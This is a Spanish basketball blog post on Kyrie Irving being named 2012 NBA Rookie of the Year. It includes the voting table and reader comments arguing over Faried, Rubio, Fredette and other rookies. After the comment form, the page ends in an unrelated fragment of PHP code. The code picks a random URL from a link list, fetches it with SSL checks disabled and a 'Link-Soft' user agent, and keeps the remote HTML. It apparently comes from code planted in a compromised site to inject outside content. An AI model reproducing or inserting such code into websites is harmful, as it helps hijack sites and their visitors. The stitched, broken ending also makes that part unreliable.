Kyrie Irving, rookie del año

15 de May de 2012 por txusma

Como se esperaba desde la lesión de Ricky Rubio, Kyrie Irving ha sido nombrado rookie del año en la NBA. El jugador de los Cavs ha obtenido la mayoría de los votos, aventajando al español, segundo a pesar de su lesión, en más de 400 puntos. Kenneth Faried ha sido tercero gracias a su gran final de temporada y el rookie de los Spurs, Kawhi Leonard, cuarto.

No puede haber ningún tipo de discusión al premio de Irving. Desde el primer día se echó los Cavs a las espaldas y a principio de temporada los llevó a flirtear incluso con los Playoffs. Ha acabado el año promediando 18’5 puntos y 5’4 asistencias, con un 46% de acierto en el tiro.

Os dejamos con la tabla de las votaciones. Por favor, que alguien nos explique porqué Josh Selby tiene un solo voto. ¿Analista borracho o cachondo?

Rookie, Team 1st 2nd 3rd Total
Kyrie Irving, Cleveland 117 2 1 592
Ricky Rubio, Minnesota 49 23 170
Kenneth Faried, Denver 1 30 34 129
Kawhi Leonard, San Antonio 1 9 15 47
Iman Shumpert, New York 1 7 7 33
Klay Thompson, Golden State 5 15 30
Isaiah Thomas, Sacramento 6 10 28
Brandon Knight, Detroit 6 3 21
Chandler Parsons, Houston 3 5 14
MarShon Brooks, New Jersey 1 1 4
Kemba Walker, Charlotte 3 3
Josh Selby, Memphis 1 1

Comenta

15 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Parsons y Thomas merecían mucho más. Les veo muy maduros para su edad y con una progresión en la liga muy buena. Faried merecía estar por encima de Ricky, y lo de Selby es de chiste… Una hornada que no pasará a la historia me temo. Nivel medio tirando a medio-bajo, y desde luego el premio es merecidísimo para Irving. Será un gran base por los próximos diez años. Pero para mí la gran sorpresa ha sido ‘Manimal’. Realmente, ha sido el único de todos ellos en destacar en un equipo de los grandes (obviando a Leonard, que en mi opinión no ha demostrado tanto como Faried), e incluso ha conseguido forzar un traspaso, el de Nené, porque realmente le había comido la tostada desde su lesión y los dirigintes veían futuro y tenían toda la confianza en él. Un trabajo ejemplar el suyo, poniendo en gravísimos apuros a los Lakers. Por la regular el ROY es Irving, que además cayó en un equipo de mierda y les tuvo en PO durante el primer mes de competición, lo cual tiene un mérito enorme, pero si miramos el global… quizá el que más méritos reales ha hecho, más ha madurado y más ha competido, dadas también sus circunstancias de caer en los Nuggets, ha sido Kenneth Faried.

    Y repito, Isaiah Thomas ha sido una gratísima sorpresa, y un buen movimiento del apoltronado Petrie. Manda cojones que acierte más con la tercera ronda que con la primera… en fin.

    El año que viene probablemente habrá más nivel, aunque de esta hornada yo destacaría su profesionalidad. No van de divos, en general han llegado luchando y defendiendo, y en muchos casos han sido el único clavo ardiendo al que se han agarrado equipos como Bobcats, Cavaliers, Kings, etc.

    Decepción en esta lista Brandon Knight, del que creo que todos esperábamos bastante más al comienzo del año, y tipos como Kanter o Biyombo que tampoco han demostrado casi nada. También los gemelos Morris. Markieff quizá merecía algún voto por ahí, pero se desinfló claramente, no se puede decir que en el global haya hecho una gran temporada. Y Marcus pasa directamente al archivo de X-Files.

    Pero sin duda el gran tufo, pufo, rufo, chufo, cuchuflo… ha sido Jimmer… cuando lei aquella frase de Durant diciendo que era el mejor tirador del mundo… ya me olía yo algo raro. Menuda mierda de temporada. No deja de tener pizcas de talento, pero su defensa, saber estar, IQ y de todo no están a la altura de un equipo de la NBA. Ha sido realmente el batacazo del año en los rookies. No sé si veis alguno más por ahí que destacar. Vesely muy verde, aunque realmente se le ve que está progresando, Vucevic tampoco ha demostrado nada del otro jueves…

      Citar

  2. txusma dice:
    #2

    Esto de las votaciones sí que es todo un expediente X. Como puede alguien votar en 2ª posición a Klay Thompson, si solo ha jugado la mitad de la temporada en un equipo que luchaba por ser el peor? Con toda la tranquilidad lo deben puesto por delante de Faried, Shumpert, Parsons, Leonard, Thomas… A mi alguien me presenta ese voto y no le dejo votar nunca más.

      Citar

  3. rumbero dice:
    #3

    Dice bastante que de las 10 primeras elecciones de este año solo aparezcan Knight y Walker (a parte de Irving) y a años luz de él.
    Yo destacaría el impacto de Ricky, que aun perdiendose media temporada está ahi, y que un tio del perfil de Leonard acabe cuarto en las votaciones. Obra del señor Popovich. En cualquier otro equipo y en manos de otro no se si lo hubieramos visto en la lista final

      Citar

  4. Melo15 dice:
    #4

    Pues para mi la decepcion de la temporada es Kemba, Jimmer ya se veia que no haria nada: tirador, sin fisico mal defensor, mal organizador y si siquiera puede jugar de escolta que en mi opinion seria muy bueno pues ofensivamente es la leche. Pero Kemba ha hecho una mal temporada, al principio se le comparaba con The Answer,JUAS! Es verdad que ha caido en los Bobcats que compartia minutos con Augustin, pero yo me esperaba mucho mas.
    Knight no creo que sea una decepcion, es un jugador para el futuro que le falta experiencia para mejorar la defensa y el IQ.
    Kanter no ha tenido minutos para demostrar lo que vale.
    Kenneth Faried, el nuevo Rodman??

      Citar

  5. sempren dice:
    #5

    El votante de Selby debió ser el mismo que en su día votó a Robin Lopez xD

      Citar

  6. Esteban dice:
    #6

    ja buenisimas las primeras selecciones de este draft, la verdad se pasaron, williams, kanter, walker, biyombo, fredette y vasely, vaya fiascos, y valanciunas nisiquiera jugo este año en la NBA

    sin dudas uno de los mejores drafts en cuanto a selecciones bajas se refiere, thomas, faried, brokks, shumpert y leonard fueron de los mejores, y todos desp del puesto 15

    los primeros puiestos todas decepciones, a exepcion de kyrie, y creo que knight…

      Citar

  7. portu dice:
    #7

    Pues vengo a defender a B. Knight, que sin mirar datos para confirmarlo (perdonad mi pereza) creo q es el rookie que más minutos ha jugado. Ha ocupado casi desde el principio el puesto de titular en los Pistons y el equipo ha jugado algo mejor que el año pasado, obviamente gracias sobretodo a Monroe, pero knight tb ha contribuido. Creo q ha estado algo tímido en ataque, con rachas malas de tiro q le han restado confianza, luego tampoco ayuda q no haya tiradores natos en el equipo de esos q reciben la asistencia y tiran, sin botar el balón (q nadie vaya a mencionar a B. Gordon q este no tira casi nunca de primeras, siempre soba la bola para acabar tirando peor posicionado q cuando la recibía)… todo esto hace q sus asistencias sean bajísimas… no es lo mismo q dársela fuera de la línea de 3 a K. Love precisamente… tb tuvo muchas pérdidas de balón en los 2 primeros meses y luego lo corrigió rápidamente. Su final de temporada ha contado con varios partidos espectaculares, sumando en todas las facetas del juego.
    En definitiva, se le ven maneras de buen base, de jugador de equipo, de los q primero intentan pasar el balón, pero con momentos de buen anotador si está en racha, combinando bien tiro exterior y penetraciones, además creo q ha formado un buen backcourt con Stuckey, q de SG por fin está en su posición natural. Me parece q Knight-Stuckey-Monroe más lo q pesquen este año en el draft formará la base de un buen proyecto de futuro de los Pistons, y globalmente, la temporada de Knight de rookie me ha parecido bastante buena… al menos al nivel de la de Ricky (más bombo mediático, más estadísticas -muchas asistencias de las de estilo NBA, esas en la q el tirador la enchufa sin botar y ale asistencia para quien se la pasa- y mejores compañeros), sólo claramente peor q la de Faried e Irving.

      Citar

  8. Lucho dice:
    #8

    Muy de acuerdo con las posiciones
    Mi quinteto son justo los 5 mas votados: Rubio, Irving (RoY), Shumpert, Leonard, Faried

      Citar

  9. txusma dice:
    #9

    Esteban:
    ja buenisimas las primeras selecciones de este draft, la verdad se pasaron, williams, kanter, walker, biyombo, fredette y vasely, vaya fiascos, y valanciunas nisiquiera jugo este año en la NBA

    Yo prefiero esperarme 2 o 3 años antes de afirmar tan rotundamente que un jugador es un fiasco.

      Citar

  10. simon dice:
    #10

    el tema es que en este draft ante la baja calidad del mismo pues los equipos de loteria prefirieron arriesgar y cojer a jugadores con potencial pero que aun les faltaba mucho para estar hechos, en vez de apostar a seguro con jugadores mas hecho pero menos potencial que calleron a posiciones bajas pues, seamos sinceros, creo que un Leonard, un Parson o incluso un Faried pueden ser buenos complementos en equipos buenos pero nunca van a ser ni un segundo ni un tercer espada de un equipo bueno, sin embargo los Williams, Kanter, Valanciunas pues son jugadores con potencial de estrella, otra cosa es que luego lo sean o no, pero los equipos de arriba tenian que arriesgar en este draft a ver que pasaba… los resultados creo que no podemos evaluarlos hasta dentro de 2 o 3 años minimo.

      Citar

  11. Melo15 dice:
    #11

    Bueno a Leonard se le ven cosas de Gerald Wallace que por lo menos era una semi-estrella, pero los jugadores que pueden ser estrellas han jugado muy poco o no se les ha dado continuidad, algo esencial en mi opinion para un Rookie: Kanter, ha jugado poquisimo pues con Favors, Milsap y Jefferson le dejan muy pocos minutos y Williams ha tenido algun mes bueno pero ahora mismo no es mejor que Beasley asi que es logico que Adelman haya prescindido de el, para mi el unico bluff es Vasely y Kanter aunque Vasely tampoco ha jugado mucho…

      Citar

  12. txusma dice:
    #12

    Ya digo. Demasiado pronto para decir quien ha sido y quien no ha sido un bluff. Incluso a Fredette le doy otro año. No puede ser que enamorara a todos los scouters en los entrenamientos privados previos al draft y ahora no valga para nada.

      Citar

  13. Sancho88 dice:
    #13

    Ya empezamos con los potenciales…

      Citar

  14. Melo15 dice:
    #14

    Txusma creo que enamoro a los Scouts en la NCAA, cuando promediaba 30 puntos por partido y no le hacia falta ni defender ni dirigir a su equipo, solo tirar y meterlas, ya lo he dicho si Fredette fuera escolta en mi opinion seria un perfecto complemente para bases distribuidores, pero no lo es asi que a joderse.
    Con Vasely, soy mas positivo si bien su temporada ha sido decepcionante le veo futuro como ala-pivot, porque de alero no vale mucho.
    Hay una estadistica que dice que Kanter rebotearia mas que Love si jugaran los mismos minutos, evidentemente estaria mas cansado pero su rendimiento no ha sido tan malo en proporcion con sus minutos.

    Creo que no se puede juzgar a los Rookies en su primera temporada mirad Garnett sino, pasa lo mismo que con Turner, primera temporada mediocre y la segunda se ha comfirmado como una posible semi-estrella.

      Citar

  15. Txusma dice:
    #15

    Recuerdo que Fredette hizo varios workouts para los GM antes del draft y en concreto uno junto a Kemba Walker y Brandon Knight. En ese workout se ganó el ser escogido antes que los otros 2. Parece raro que ahora sea el que peor temporada haya hecho pero vaya, que ya veremos el año q viene si la cosa continúa igual

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>